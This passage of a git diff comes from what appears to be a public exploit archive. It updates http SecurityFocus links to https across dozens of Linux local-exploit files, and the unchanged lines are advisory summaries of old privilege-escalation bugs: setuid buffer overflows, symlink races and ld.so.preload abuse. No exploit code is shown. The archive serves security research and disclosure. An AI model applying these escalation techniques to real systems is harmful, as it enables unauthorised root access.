a buffer overflow attack due to lack of bounds checking on an argument it is passed. As a result, a local user can elevate their priviliges to root through overruning the stack and executing arbitrary code with the effective user-id of the process (root). diff --git a/exploits/linux/local/19804.pl b/exploits/linux/local/19804.pl index c72156fe1..035273ea4 100755 --- a/exploits/linux/local/19804.pl +++ b/exploits/linux/local/19804.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1048/info +source: https://www.securityfocus.com/bid/1048/info atsar is a linux load monitoring software package released under the GPL by AT Computing. atsadc is a setuid root binary that is included in the atsar package. atsadc is setuid because it obtains informatin via /dev/kmem. atsadc will accept as an argument an output file, which it will open -- without checking to make sure the user executing atsadc has the priviliges to do so. After it has opened and created (or overwritten) the target file as root, the permissions set on the file will allow the attacker to write to it. Since this file is arbitrary, it is possible to gain root locally in any number of ways through creating malicious system files. In Teso's proof of concept exploit, root priviliges are gained by creating a malicious shared library to be preloaded and creating/specifying that library in /etc/ld.so.preload (and then executing a setuid binary..). diff --git a/exploits/linux/local/19811.c b/exploits/linux/local/19811.c index 1322f7641..fa07414f7 100644 --- a/exploits/linux/local/19811.c +++ b/exploits/linux/local/19811.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1060/info +// source: https://www.securityfocus.com/bid/1060/info A vulnerability exists in the 'imwheel' package for Linux. This package is known to be vulnerable to a buffer overrun in its handling of the HOME environment variable. By supplying a sufficiently long string containing machine executable code, the imwheel program can be caused to run arbitrary commands as root. This is due to a setuid root perl script named 'imwheel-solo' which invokes the imwheel program with effective UID 0. diff --git a/exploits/linux/local/19812.c b/exploits/linux/local/19812.c index 614cd6499..64d6a7fab 100644 --- a/exploits/linux/local/19812.c +++ b/exploits/linux/local/19812.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1060/info +// source: https://www.securityfocus.com/bid/1060/info A vulnerability exists in the 'imwheel' package for Linux. This package is known to be vulnerable to a buffer overrun in its handling of the HOME environment variable. By supplying a sufficiently long string containing machine executable code, the imwheel program can be caused to run arbitrary commands as root. This is due to a setuid root perl script named 'imwheel-solo' which invokes the imwheel program with effective UID 0. diff --git a/exploits/linux/local/19813.txt b/exploits/linux/local/19813.txt index 6df9dc59b..6a8222a1b 100644 --- a/exploits/linux/local/19813.txt +++ b/exploits/linux/local/19813.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1061/info +source: https://www.securityfocus.com/bid/1061/info A vulnerability exists in the kreatecd program for Linux. This program is a graphical front end to the cdrecord program, and is installed setuid root. This program will blindly trust the configuration of the path to cdrecord, as specified by the user. This means that arbitrary programs can be executed as root by an attacker using kreatecd. It appears that graphical interaction is required to exploit this program. diff --git a/exploits/linux/local/19816.txt b/exploits/linux/local/19816.txt index a645b965a..adb9eef09 100644 --- a/exploits/linux/local/19816.txt +++ b/exploits/linux/local/19816.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1069/info +source: https://www.securityfocus.com/bid/1069/info A vulnerability exists in the gpm-root program, part of the gpm package. This package is used to enable mice on the consoles of many popular Linux distributions. The problem is a design error, caused when a programmer chose to attempt to revert to the running users groups, after having called setuid to the users id already. The setgid call fails, and the process maintains the groups the gpm-root program is running as. This is usually the 'root' group. diff --git a/exploits/linux/local/19837.c b/exploits/linux/local/19837.c index 010472cc9..515591856 100644 --- a/exploits/linux/local/19837.c +++ b/exploits/linux/local/19837.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1096/info +// source: https://www.securityfocus.com/bid/1096/info Bray Systems Linux Trustees is an access control program which manages user permissions similar to implementations of Netware. Requesting an unusually long file or directory path will cause the application to hang. Other processes may also be affected. In order to regain normal functionality, the user must reboot the machine. diff --git a/exploits/linux/local/19838.c b/exploits/linux/local/19838.c index 666266d26..09c7103e6 100644 --- a/exploits/linux/local/19838.c +++ b/exploits/linux/local/19838.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1097/info +// source: https://www.securityfocus.com/bid/1097/info CRYPTOCard CRYPTOAdmin is a network authentication application for use with the Palm OS platform. CRYPTOAdmin generates a .pdb file which contains the username, PIN number, serial number, and key in encrypted or plaintext format. The PIN number can be retrieved due to the software's usage of a fixed 4-byte value in key generation. With access to the .pdb file and PIN number, a user is capable of duplicating the token onto another Palm device effectively gaining access to the network as the compromised user. diff --git a/exploits/linux/local/19867.txt b/exploits/linux/local/19867.txt index 8978552c4..d5b4cec5b 100644 --- a/exploits/linux/local/19867.txt +++ b/exploits/linux/local/19867.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1130/info +source: https://www.securityfocus.com/bid/1130/info A vulnerability exists in SuSE Linux, version 6.3 and prior, that can allow arbitrary users to delete any file on the system. If the MAX_DAYS_IN_TMP variable is set in /etc/rc.config to be larger than 0, any local user can remove any file on the system. This is due to a flaw in /etc/cron.daily/aaa_base in SuSE 6.3, or /root/bin/cron.daily in older versions. diff --git a/exploits/linux/local/19883.c b/exploits/linux/local/19883.c index cda0246d6..0c9b45f5c 100644 --- a/exploits/linux/local/19883.c +++ b/exploits/linux/local/19883.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1155/info +// source: https://www.securityfocus.com/bid/1155/info A vulnerability exists in the handling of the DISPLAY variable, in versions of Gnomelib shipped with S.u.S.E. Linux, version 6.3. By supplying a long buffer containing machine executable code in the DISPLAY environment variable, it is possible to execute arbitrary code with the permissions of the user running the binary. In the case of a setuid binary, it is possible to obtain the privileges of the user it is setuid to. This in turn may be used to elevate privileges, and in theory could result in local root compromise. diff --git a/exploits/linux/local/19900.c b/exploits/linux/local/19900.c index 11872503b..d21b94970 100644 --- a/exploits/linux/local/19900.c +++ b/exploits/linux/local/19900.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/1176/info +source: https://www.securityfocus.com/bid/1176/info A vulnerability exists in the pam_console PAM module, included as part of any Linux system running PAM. pam_console exists to own certain devices to users logging in to the console of a Linux machine. It is designed to allow only console users to utilize things such as sound devices. It will chown devices to users upon logging in, and chown them back to being owned by root upon logout. However, as certain devices do not have a 'hangup' mechanism, like a tty device, it is possible for a local user to continue to monitor activity on certain devices after logging out. This could allow an malicious user to sniff other users console sessions, and potentially obtain the root password if the root user logs in, or a user su's to root. They could also surreptitiously execute commands as the user on the console. */ diff --git a/exploits/linux/local/19915.txt b/exploits/linux/local/19915.txt index c567cabdf..b91a61272 100644 --- a/exploits/linux/local/19915.txt +++ b/exploits/linux/local/19915.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1206/info +source: https://www.securityfocus.com/bid/1206/info Some linux distributions (S.u.S.E. 6.4 reported) ship with kscd (a CD player for the KDE Desktop) sgid disk. kscd uses the contents of the 'SHELL' environment variable to execute a browser. This makes it possible to obtain a sgid 'disk' shell. Using these privileges along with code provided in the exploit, it is possible to change attributes on raw disks. This in turns allows an attacker to create a root shell, thus compromising the intergrity of the machine. diff --git a/exploits/linux/local/19925.c b/exploits/linux/local/19925.c index 2d5b82323..4ac48c199 100644 --- a/exploits/linux/local/19925.c +++ b/exploits/linux/local/19925.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1220/info +// source: https://www.securityfocus.com/bid/1220/info Several buffer overflow vulnerabilities exist in Kerberos 5 implmenetations due to buffer overflows in the Kerberos 4 compatability code. These include MIT Kerberos 5 releases 1.0.x, 1.1 and 1.1.1, MIT Kerberos 4 patch level 10 (and, most likely, prior releases), and Cygnus KerbNet and Network Security (CNS). The main source of problems is due to a buffer overflow in the krb_rd_req() library function. This function is used by every application that supports Kerberos 4 authentication, including, but not limited to, kshrd, klogin, telnetd, ftpd, rkinitd, v4rcp and kpopd. Therefore, it is possible for a remote attacker to exploit this vulnerability and gain root access on affected machines, or obtain root level access once local. diff --git a/exploits/linux/local/19946.txt b/exploits/linux/local/19946.txt index ab5383b95..d70c65f52 100644 --- a/exploits/linux/local/19946.txt +++ b/exploits/linux/local/19946.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1232/info +source: https://www.securityfocus.com/bid/1232/info A vulnerability exists in OpenLDAP as shipped with some versions of Linux, including RedHat 6.1 and 6.2, and TurboLinux 6.0.2 and earlier. OpenLDAP will create files in /usr/tmp, which is actually a symbolic link to the world writable /tmp directory. As OpenLDAP does not check for a files existence prior to opening the files in /usr/tmp, it is possible for an attacker to point an appropriately named symbolic link at any file on the filesystem, and cause it to be destroyed. diff --git a/exploits/linux/local/19952.c b/exploits/linux/local/19952.c index 1d56e60a6..895d0ff7e 100644 --- a/exploits/linux/local/19952.c +++ b/exploits/linux/local/19952.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1239/info +// source: https://www.securityfocus.com/bid/1239/info A buffer overflow exists in the 0.8 version of the fdmount program, distributed with a number of popular versions of Linux. By supplying a large, well crafted buffer containing machine executable code in place of the mount point, it is possible for users in the 'floppy' group to execute arbitrary commands as root. diff --git a/exploits/linux/local/19953.c b/exploits/linux/local/19953.c index 966db8cc8..97627f3bc 100644 --- a/exploits/linux/local/19953.c +++ b/exploits/linux/local/19953.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1239/info +// source: https://www.securityfocus.com/bid/1239/info A buffer overflow exists in the 0.8 version of the fdmount program, distributed with a number of popular versions of Linux. By supplying a large, well crafted buffer containing machine executable code in place of the mount point, it is possible for users in the 'floppy' group to execute arbitrary commands as root. diff --git a/exploits/linux/local/19954.c b/exploits/linux/local/19954.c index 561ab63eb..a0c7edaa7 100644 --- a/exploits/linux/local/19954.c +++ b/exploits/linux/local/19954.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1239/info +// source: https://www.securityfocus.com/bid/1239/info A buffer overflow exists in the 0.8 version of the fdmount program, distributed with a number of popular versions of Linux. By supplying a large, well crafted buffer containing machine executable code in place of the mount point, it is possible for users in the 'floppy' group to execute arbitrary commands as root. diff --git a/exploits/linux/local/19955.c b/exploits/linux/local/19955.c index c3202fb2f..235f9ad58 100644 --- a/exploits/linux/local/19955.c +++ b/exploits/linux/local/19955.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1242/info +// source: https://www.securityfocus.com/bid/1242/info A vulnerability exists in version 2.53 and prior of qpopper, a popular POP server, from Qualcomm. By placing machine executable code in the X-UIDL header field, supplying formatting strings in the "From:" field in a mail header, and then issuing, as the user the mail was sent to, a 'euidl' command, it is possible to execute arbitrary code. This code will execute as the user executing the euidl command, but with group 'mail' permissions on hosts running qpopper in that group. This is often done due to mail spool permissions. diff --git a/exploits/linux/local/19969.c b/exploits/linux/local/19969.c index 45e33598e..7e8ef05e1 100644 --- a/exploits/linux/local/19969.c +++ b/exploits/linux/local/19969.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1265/info +// source: https://www.securityfocus.com/bid/1265/info The linux cdrecorder binary is vulnerable to a locally exploitable buffer overflow attack. When installed in a Mandrake 7.0 linux distribution, it is by default setgid "cdburner" (which is a group, gid: 80, that is created for the application). The overflow condition is the result of no bounds checking on the 'dev=' argument passed to cdburner at execution time. This vulnerability can be exploited to execute arbitrary commands with egid "cdburner". cdburner has been verified (by the writers of the exploit) to be exploitable on an Intel linux system running Mandrake 7.0. Other distributions of linux may be vulnerable to this problem as well. diff --git a/exploits/linux/local/19970.c b/exploits/linux/local/19970.c index fc49ef267..d3387d3b5 100644 --- a/exploits/linux/local/19970.c +++ b/exploits/linux/local/19970.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1274/info +// source: https://www.securityfocus.com/bid/1274/info /usr/bin/kdesud has a DISPLAY environment variable overflow which could allow for the execution of arbitrary code. diff --git a/exploits/linux/local/19979.pl b/exploits/linux/local/19979.pl index 1d02946cc..89f0937b7 100755 --- a/exploits/linux/local/19979.pl +++ b/exploits/linux/local/19979.pl @@ -1,4 +1,4 @@ -#source: http://www.securityfocus.com/bid/1291/info +#source: https://www.securityfocus.com/bid/1291/info # #The KDE configuration-file management has a bug which could result in root compromise. # diff --git a/exploits/linux/local/19980.pl b/exploits/linux/local/19980.pl index 0e7f0c348..769866b54 100755 --- a/exploits/linux/local/19980.pl +++ b/exploits/linux/local/19980.pl @@ -1,4 +1,4 @@ -#source: http://www.securityfocus.com/bid/1291/info +#source: https://www.securityfocus.com/bid/1291/info # #The KDE configuration-file management has a bug which could result in root compromise. # diff --git a/exploits/linux/local/19981.sh b/exploits/linux/local/19981.sh index 0bfc8e03f..03da06c7c 100755 --- a/exploits/linux/local/19981.sh +++ b/exploits/linux/local/19981.sh @@ -1,4 +1,4 @@ -#source: http://www.securityfocus.com/bid/1291/info +#source: https://www.securityfocus.com/bid/1291/info # #The KDE configuration-file management has a bug which could result in root compromise. # diff --git a/exploits/linux/local/19991.c b/exploits/linux/local/19991.c index b69a511bb..cc19efbf2 100644 --- a/exploits/linux/local/19991.c +++ b/exploits/linux/local/19991.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1305/info +// source: https://www.securityfocus.com/bid/1305/info Some Linux distributions ship with BSD mailx 8.1.1-10 (On Slackware 7.x it can be found as /usr/bin/Mail). diff --git a/exploits/linux/local/19992.c b/exploits/linux/local/19992.c index 2261dedea..037a4f842 100644 --- a/exploits/linux/local/19992.c +++ b/exploits/linux/local/19992.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/1305/info +source: https://www.securityfocus.com/bid/1305/info Some Linux distributions ship with BSD mailx 8.1.1-10 (On Slackware 7.x it can be found as /usr/bin/Mail). diff --git a/exploits/linux/local/20000.c b/exploits/linux/local/20000.c index 58702ee7d..4991f16c8 100644 --- a/exploits/linux/local/20000.c +++ b/exploits/linux/local/20000.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/1322/info +source: https://www.securityfocus.com/bid/1322/info POSIX "Capabilities" have recently been implemented in the Linux kernel. These "Capabilities" are an additional form of privilege control to enable more specific control over what priviliged processes can do. Capabilities are implemented as three (fairly large) bitfields, which each bit representing a specific action a privileged process can perform. By setting specific bits, the actions of priviliged processes can be controlled -- access can be granted for various functions only to the specific parts of a program that require them. It is a security measure. The problem is that capabilities are copied with fork() execs, meaning that if capabilities are modified by a parent process, they can be carried over. The way that this can be exploited is by setting all of the capabilities to zero (meaning, all of the bits are off) in each of the three bitfields and then executing a setuid program that attempts to drop priviliges before executing code that could be dangerous if run as root, such as what sendmail does. When sendmail attempts to drop priviliges using setuid(getuid()), it fails not having the capabilities required to do so in its bitfields. It continues executing with superuser priviliges, and can run a users .forward file as root leading to a complete compromise. Procmail can also be exploited in this manner. diff --git a/exploits/linux/local/20001.sh b/exploits/linux/local/20001.sh index b734844d2..8125c26db 100755 --- a/exploits/linux/local/20001.sh +++ b/exploits/linux/local/20001.sh @@ -1,4 +1,4 @@ -#source: http://www.securityfocus.com/bid/1322/info +#source: https://www.securityfocus.com/bid/1322/info # # POSIX "Capabilities" have recently been implemented in the Linux kernel. These "Capabilities" are an additional form of privilege control to enable more specific control over what priviliged processes can do. Capabilities are implemented as three (fairly large) bitfields, which each bit representing a specific action a privileged process can perform. By setting specific bits, the actions of priviliged processes can be controlled -- access can be granted for various functions only to the specific parts of a program that require them. It is a security measure. The problem is that capabilities are copied with fork() execs, meaning that if capabilities are modified by a parent process, they can be carried over. The way that this can be exploited is by setting all of the capabilities to zero (meaning, all of the bits are off) in each of the three bitfields and then executing a setuid program that attempts to drop priviliges before executing code that could be dangerous if run as root, such as what sendmail does. When sendmail attempts to drop priviliges using setuid(getuid()), it fails not having the capabilities required to do so in its bitfields. It continues executing with superuser priviliges, and can run a users .forward file as root leading to a complete compromise. Procmail can also be exploited in this manner. diff --git a/exploits/linux/local/20004.c b/exploits/linux/local/20004.c index 4034560c6..07d59e29a 100644 --- a/exploits/linux/local/20004.c +++ b/exploits/linux/local/20004.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1330/info +// source: https://www.securityfocus.com/bid/1330/info A buffer overflow exists in the 'restore' program, part of the dump 0.4b15-1 package, distributed with RedHat Linux 6.2. By supplying a long string containing machine executable code at the prompt for a tape name, it is possible for an attacker to execute arbitrary code with root privileges. diff --git a/exploits/linux/local/20013.c b/exploits/linux/local/20013.c index 88160bc42..0af86a735 100644 --- a/exploits/linux/local/20013.c +++ b/exploits/linux/local/20013.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1346/info +// source: https://www.securityfocus.com/bid/1346/info A buffer overflow condition that could be exploited to obtain root exists in splitvt 1.6.3 and earlier. Splitvt is distributed with several Linux distributions. diff --git a/exploits/linux/local/20021.txt b/exploits/linux/local/20021.txt index 3b915ae2c..82f285c3c 100644 --- a/exploits/linux/local/20021.txt +++ b/exploits/linux/local/20021.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1367/info +source: https://www.securityfocus.com/bid/1367/info Password changes submitted to Red Hat Piranha via HTTP are insecurely passed as variables in a GET request. Unauthorized users could obtain the password by reading the httpd access log or by sniffing. diff --git a/exploits/linux/local/20024.c b/exploits/linux/local/20024.c index 20a682167..0eb36d1cd 100644 --- a/exploits/linux/local/20024.c +++ b/exploits/linux/local/20024.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/1371/info +source: https://www.securityfocus.com/bid/1371/info KON (Kanji On Console) is a package for displaying Kanji text under Linux and comes with two suid binaries which are vulnerable to buffer overflows. "fld", one of the vulnerable programs, accepts options input from a text file. Through this mechanism it is possible to input arbitrary code into the stack and spawn a root shell. The other binary, kon, suffers from a buffer overflow as well. The buffer overflow in kon can be exploited via the -StartupMessage command line option, and fld via the command line options: -t bdf */ diff --git a/exploits/linux/local/20045.c b/exploits/linux/local/20045.c index c70cdbd6a..a4ec272d4 100644 --- a/exploits/linux/local/20045.c +++ b/exploits/linux/local/20045.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1408/info +// source: https://www.securityfocus.com/bid/1408/info A vulnerability exists in the _XAsyncReply() function of libX11. This function utilizes size information retrieved as part of a client supplied packet. This value is a signed integer. By forcing this value to be negative, it becomes possible to cause stack corruption. It is further possible to use this stack corruption to overwrite the return address on the stack. In theory, this could be used to execute arbitrary code. On systems where there are setuid X applications, such as xterm, it is possible for a local user to gain root. diff --git a/exploits/linux/local/20093.c b/exploits/linux/local/20093.c index 114aa4cf4..80cef49f0 100644 --- a/exploits/linux/local/20093.c +++ b/exploits/linux/local/20093.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/1495/info +source: https://www.securityfocus.com/bid/1495/info Xconq is a multiple player strategy game available for many unix platforms. It contains a number of buffer overflow vulnerabilities including the ability to overflow stack buffers with either the DISPLAY or the USER environment variables. The Redhat Linux Xconq package installs the game with SGID 'games' privileges allowing an attacker to compromise the local 'games' group. */ diff --git a/exploits/linux/local/20141.pl b/exploits/linux/local/20141.pl index ddb30f442..e54d79e0d 100755 --- a/exploits/linux/local/20141.pl +++ b/exploits/linux/local/20141.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1547/info +source: https://www.securityfocus.com/bid/1547/info The interaction between some security checks performed by suidperl, the setuid version of perl, and the /bin/mail program creates a scenario that allows local malicious users to execute commands with root privileges. diff --git a/exploits/linux/local/20142.sh b/exploits/linux/local/20142.sh index 26802bacb..782fb2a76 100755 --- a/exploits/linux/local/20142.sh +++ b/exploits/linux/local/20142.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1547/info +source: https://www.securityfocus.com/bid/1547/info The interaction between some security checks performed by suidperl, the setuid version of perl, and the /bin/mail program creates a scenario that allows local malicious users to execute commands with root privileges. diff --git a/exploits/linux/local/20155.txt b/exploits/linux/local/20155.txt index 0fdced2b3..fc2685eb3 100644 --- a/exploits/linux/local/20155.txt +++ b/exploits/linux/local/20155.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1586/info +source: https://www.securityfocus.com/bid/1586/info A vulnerability exists in the installation of Multisoft's FlagShip 4.4 product. Some binaries are installed with world writable permissions. This may allow an attacker to alter a binary and cause other users to execute arbitrary code. diff --git a/exploits/linux/local/20160.txt b/exploits/linux/local/20160.txt index 8e1edc739..5d696d0c6 100644 --- a/exploits/linux/local/20160.txt +++ b/exploits/linux/local/20160.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1599/info +source: https://www.securityfocus.com/bid/1599/info Minicom is a unix terminal program often used for communication between computers with modems. It is often installed setgid uucp, as this access is required for regular users to use certain devices on the system. Through specifying a capture-file on the command line, a file can be created with effective gid uucp and thus owned by gid uucp. Where this is a serious concern is on systems using uucp -- critical files writeable by group uucp can be overwritten by exploiting this vulnerability leading to other problems. diff --git a/exploits/linux/local/20185.c b/exploits/linux/local/20185.c index c23a9b6c7..916f50051 100644 --- a/exploits/linux/local/20185.c +++ b/exploits/linux/local/20185.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/1634/info +source: https://www.securityfocus.com/bid/1634/info Conectiva 4.x/5.x,Debian 2.x,IBM AIX 3.x/4.x,Mandrake 7,RedHat 5.x/6.x,IRIX 6.x, Solaris 2.x/7/8,Turbolinux 6.x,Wirex Immunix OS 6.2 Locale Subsystem Format String diff --git a/exploits/linux/local/20250.c b/exploits/linux/local/20250.c index ad1bd99f3..0d6455276 100644 --- a/exploits/linux/local/20250.c +++ b/exploits/linux/local/20250.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1739/info +// source: https://www.securityfocus.com/bid/1739/info Traceroute is a well-known network diagnostic tool used for analyzing the path on a network between two hosts. On unix systems, traceroute is typically installed setuid root because of its use of raw sockets. Certain versions of LBNL traceroute are vulnerable to an interesting attack involving freeing of pointers pointing to unallocated memory. diff --git a/exploits/linux/local/20251.c b/exploits/linux/local/20251.c index 5fa08438a..ce877d73b 100644 --- a/exploits/linux/local/20251.c +++ b/exploits/linux/local/20251.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1739/info +// source: https://www.securityfocus.com/bid/1739/info Traceroute is a well-known network diagnostic tool used for analyzing the path on a network between two hosts. On unix systems, traceroute is typically installed setuid root because of its use of raw sockets. Certain versions of LBNL traceroute are vulnerable to an interesting attack involving freeing of pointers pointing to unallocated memory. diff --git a/exploits/linux/local/20252.c b/exploits/linux/local/20252.c index ce6028e0b..d50f4ba6b 100644 --- a/exploits/linux/local/20252.c +++ b/exploits/linux/local/20252.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1739/info +// source: https://www.securityfocus.com/bid/1739/info Traceroute is a well-known network diagnostic tool used for analyzing the path on a network between two hosts. On unix systems, traceroute is typically installed setuid root because of its use of raw sockets. Certain versions of LBNL traceroute are vulnerable to an interesting attack involving freeing of pointers pointing to unallocated memory. diff --git a/exploits/linux/local/20285.c b/exploits/linux/local/20285.c index 7b31aa020..fbc6a50df 100644 --- a/exploits/linux/local/20285.c +++ b/exploits/linux/local/20285.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1785/info +// source: https://www.securityfocus.com/bid/1785/info A vulnerability exists in tmpwatch, a utility which automates the removal of temporary files in unix-like systems. An optional component of tmpwatch, fuser, improperly handles arguments to system() library calls. If an attacker creates a file with a maliciously-constructed filename including shell meta characters, and -fuser is run on this file, the attacker may be able to execute arbitrary commands, potentially compromising superuser access if tmpwatch is run with root privileges. diff --git a/exploits/linux/local/20291.sh b/exploits/linux/local/20291.sh index 2a1839d66..ec8e96dda 100755 --- a/exploits/linux/local/20291.sh +++ b/exploits/linux/local/20291.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1802/info +source: https://www.securityfocus.com/bid/1802/info Elm is a popular Unix mail client. A vulnerability exists in Elm's 'filter' utility which can grant an attacker access to any user's mail spool. By exploiting a race condition which exists in the creation of temporary files, an unauthorized user can delete an open temporary file and replace it with a symbolic link pointing to any other user's mail spool. The mailmessage function will then follow this link, and copy the contents of the victim's mail file to that of the attacker. The obvious result is that the attacker is able to read the victim's mail messages. diff --git a/exploits/linux/local/2031.c b/exploits/linux/local/2031.c index 781806c67..8ff297e7f 100644 --- a/exploits/linux/local/2031.c +++ b/exploits/linux/local/2031.c @@ -1,4 +1,4 @@ - /* +/* * $Id: raptor_prctl2.c,v 1.3 2006/07/18 13:16:45 raptor Exp $ * * raptor_prctl2.c - Linux 2.6.x suid_dumpable2 (logrotate) diff --git a/exploits/linux/local/20312.c b/exploits/linux/local/20312.c index 3e86a02de..682437315 100644 --- a/exploits/linux/local/20312.c +++ b/exploits/linux/local/20312.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1828/info +// source: https://www.securityfocus.com/bid/1828/info Oracle Internet Directory 2.0.6 is a pre-alpha development release, available as both an addon package and in the Oracle Database Software release 8.1.6. A vulnerability has been found in the oidldap binary within the package. diff --git a/exploits/linux/local/20316.txt b/exploits/linux/local/20316.txt index c6e3bc644..7a19031e3 100644 --- a/exploits/linux/local/20316.txt +++ b/exploits/linux/local/20316.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1834/info +source: https://www.securityfocus.com/bid/1834/info lpr is a set of printing tools for unix systems. The lpr package that ships with RedHat Linux 6.2 (and possibly earlier versions) contains a vulnerability that will allow an attacker to execute arbitrary commands with the privileges of group 'lp'. diff --git a/exploits/linux/local/20338.c b/exploits/linux/local/20338.c index 3b7ec0253..1c4131e0a 100644 --- a/exploits/linux/local/20338.c +++ b/exploits/linux/local/20338.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1872/info +// source: https://www.securityfocus.com/bid/1872/info The Samba software suite is a collection of programs that implements the SMB protocol for unix systems, allowing you to serve files and printers to Windows, NT, OS/2 and DOS clients. This protocol is sometimes also referred to as the LanManager or Netbios protocol. Samba ships with a utility titled SWAT (Samba Web Administration Tool) which is used for remote administration of the Samba server and is by default set to run from inetd as root on port 701. Certain versions of this software ship with a vulnerability local users can use to leverage root access. diff --git a/exploits/linux/local/20339.sh b/exploits/linux/local/20339.sh index 0b67d555b..e2ba51ecf 100755 --- a/exploits/linux/local/20339.sh +++ b/exploits/linux/local/20339.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1872/info +source: https://www.securityfocus.com/bid/1872/info The Samba software suite is a collection of programs that implements the SMB protocol for unix systems, allowing you to serve files and printers to Windows, NT, OS/2 and DOS clients. This protocol is sometimes also referred to as the LanManager or Netbios protocol. Samba ships with a utility titled SWAT (Samba Web Administration Tool) which is used for remote administration of the Samba server and is by default set to run from inetd as root on port 701. Certain versions of this software ship with a vulnerability local users can use to leverage root access. diff --git a/exploits/linux/local/20341.sh b/exploits/linux/local/20341.sh index 38a942802..c200da942 100755 --- a/exploits/linux/local/20341.sh +++ b/exploits/linux/local/20341.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1874/info +source: https://www.securityfocus.com/bid/1874/info The Samba software suite is a collection of programs that implements the SMB protocol for unix systems, allowing you to serve files and printers to Windows, NT, OS/2 and DOS clients. This protocol is sometimes also referred to as the LanManager or Netbios protocol. Samba ships with a utility titled SWAT (Samba Web Administration Tool) which is used for remote administration of the Samba server and is by default set to run from inetd as root on port 701. Certain versions of this software ship with a vulnerability local users can use to leverage root access. diff --git a/exploits/linux/local/20378.pl b/exploits/linux/local/20378.pl index 7897a813c..a0772d73e 100755 --- a/exploits/linux/local/20378.pl +++ b/exploits/linux/local/20378.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1895/info +source: https://www.securityfocus.com/bid/1895/info top is a program used to display system usage statistics in real time written by GoupSys Consulting but shipped by default as a core component with many operating systems. On BSD systems, top is installed setgid kmem so that it may read process information from kernel memory if executed by a user who does not have that privilege. diff --git a/exploits/linux/local/20385.sh b/exploits/linux/local/20385.sh index d41d76617..81c04a110 100755 --- a/exploits/linux/local/20385.sh +++ b/exploits/linux/local/20385.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1914/info +source: https://www.securityfocus.com/bid/1914/info restore is a program for backup and recovery procedures, distributed with the RedHat Linux Operating System. A vulnerability exists that could allow a user elevated permissions. diff --git a/exploits/linux/local/20402.sh b/exploits/linux/local/20402.sh index 91b5f5221..6c7c58db5 100755 --- a/exploits/linux/local/20402.sh +++ b/exploits/linux/local/20402.sh @@ -1,4 +1,4 @@ -# source: http://www.securityfocus.com/bid/1936/info +# source: https://www.securityfocus.com/bid/1936/info # # Modutils is a component of many linux systems that includes tools for using loadable kernel modules. One of these tools, modprobe, loads a set of modules that correspond to a provided "name" (passed at the command line) automatically. Modprobe version 2.3.9 and possibly others around it contain a vulnerability (present since March 12, 1999) that can lead to a local root compromise. # diff --git a/exploits/linux/local/20411.c b/exploits/linux/local/20411.c index c2f2dac5f..3d5794ee2 100644 --- a/exploits/linux/local/20411.c +++ b/exploits/linux/local/20411.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/1968/info +source: https://www.securityfocus.com/bid/1968/info cmctl is the Connection Control Manager, part of the Oracle 8i installation. A vulnerability exists that can allow elevation of privileges. diff --git a/exploits/linux/local/20458.txt b/exploits/linux/local/20458.txt index 69e6e21c9..a6696ea39 100644 --- a/exploits/linux/local/20458.txt +++ b/exploits/linux/local/20458.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2044/info +source: https://www.securityfocus.com/bid/2044/info Ptrace is a unix system call that is used to analyze running processes, usually for breakpoint debugging. The linux implementation of ptrace in 2.2.x kernels (and possibly earlier versions) contains a vulnerability that may allow an attacker to gain sensitive information in non-readable non-setuid executable files. diff --git a/exploits/linux/local/20493.sh b/exploits/linux/local/20493.sh index 4dd92719e..8763322ec 100755 --- 